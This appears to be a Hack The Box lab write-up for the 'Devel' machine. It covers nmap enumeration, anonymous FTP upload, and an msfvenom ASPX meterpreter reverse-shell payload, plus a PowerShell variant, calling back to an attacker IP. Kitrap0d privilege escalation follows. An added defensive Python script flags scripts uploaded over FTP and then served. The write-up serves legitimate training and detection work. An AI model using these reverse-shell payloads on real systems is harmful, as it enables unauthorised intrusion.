# Devel HTB

## Enumeration

* We use nmap to enumerate: `nmap -p- -A -T4 10.10.10.5` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ff2b6e0d7464700d2b01145488d68085db8e6cbc%2Fb7cf63eb8c6ea51d86bad5ccb3c8dc1f.png?alt=media)
* We found that FTP allows anonymous access
* We found a website hosted on the IP (poor hygiene) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-36a724ea95f3c888078a9ecce57b7268fa0679db%2Ff778a60dd8010e74464e3e2141b07f8d.png?alt=media)
* We used *dirbuster* to brute-force the directories: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-72fe8b1daf35b6422086894392959f75b52c8b99%2F0715e3cd286726b8c2def1a6f181be9c.png?alt=media) We found nothing :(

#### FTP

We can log in to FTP anonymously and upload files: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2909be2b10ed873885a705655b2e7973dda7e6a9%2F67d502c19c3c0856ceb60eca4d6888b3.png?alt=media) We can exploit this and use it to our advantage.

## Exploitation

* We can use this cheat sheet: <https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom> and use the ASP/x payload.
* To output the ex.aspx file with the payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx > ex.aspx`
* We use `msfconsole` to listen on port 4444
* Upload the file over FTP, preferably in binary mode. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a9fe23936b6f3493a2479a73dcd0b9fe8aaaf592%2F40025786967ebd9c87b2dcf1c8eda781.png?alt=media)
* WE GET A METERPRETER SHELL!!!! ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cfd80633f4a3711ffa72bac9002bff49bb7ab0b8%2Fe309c275f762cf167d314aa32e6ac6a9.png?alt=media)
* We can also use `msfvenom -p windows/powershell/powershell_reverse_tcp LHOST=10.10.16.9` to gain access without metasploit.
* We can use the post-exploitation module called suggester: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ef2a1051c5757b3a0046b01aa08de48b239a7165%2Fd5d0fc85ef20a7e45f6cd086614fdcce.png?alt=media)
* Using kitrap0d for privilege escalation during post-exploitation, we got admin access ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-566159ad4a9b916a0adef933cf35ad58b29c7aff%2F132af84569da1d754fd6b02a49fc1b5c.png?alt=media)
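
From the defender's side, the anonymous FTP upload of `ex.aspx` described above leaves a trail in the server logs. The following is an added example, not part of the original writeup: it correlates FTP and web access logs to flag script files written by an anonymous FTP user and later served by the web server. The W3C-style log layout, the field names, the sample lines and the assumption that the FTP root maps to the web root are all constructed for illustration.

```python
from datetime import datetime, timedelta

SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".asmx")  # types the web server executes
ANON_USERS = {"anonymous", "ftp"}
WRITE_CMDS = {"STOR", "APPE"}

# Constructed sample logs. Assumption: W3C-style logs with a "#Fields:" header.
FTP_SAMPLE = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 10.10.16.9 - 10.10.10.5 21 USER anonymous 331
2024-01-01 10:00:02 10.10.16.9 anonymous 10.10.10.5 21 PASS *** 230
2024-01-01 10:00:09 10.10.16.9 anonymous 10.10.10.5 21 STOR ex.aspx 226
2024-01-01 10:00:20 10.10.16.9 anonymous 10.10.10.5 21 STOR notes.txt 226""".splitlines()
HTTP_SAMPLE = """#Fields: date time s-ip cs-method cs-uri-stem s-port c-ip sc-status
2024-01-01 09:59:00 10.10.10.5 GET /index.htm 80 10.10.16.9 200
2024-01-01 10:00:30 10.10.10.5 GET /ex.aspx 80 10.10.16.9 200""".splitlines()

def parse_w3c(lines):
    """Yield one dict per record, taking column names from the #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            row["file"] = row["cs-uri-stem"].rsplit("/", 1)[-1].lower()
            yield row

def find_uploaded_script_hits(ftp_lines, http_lines, window=timedelta(hours=24)):
    """Return alerts for scripts written by anonymous FTP and then served over HTTP."""
    uploads = {}  # file name -> (upload time, uploader IP)
    for r in parse_w3c(ftp_lines):
        if (r["cs-method"].upper() in WRITE_CMDS and r["sc-status"] == "226"
                and r["cs-username"].lower() in ANON_USERS
                and r["file"].endswith(SCRIPT_EXTS)):
            uploads[r["file"]] = (r["ts"], r["c-ip"])
    alerts = []
    for r in parse_w3c(http_lines):
        if r["file"] in uploads and r["sc-status"].startswith("2"):
            up_ts, uploader = uploads[r["file"]]
            delay = r["ts"] - up_ts
            if timedelta(0) <= delay <= window:
                alerts.append({"file": r["file"], "uploader": uploader,
                               "requester": r["c-ip"], "delay_s": int(delay.total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_uploaded_script_hits(FTP_SAMPLE, HTTP_SAMPLE):
        print(alert)
```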
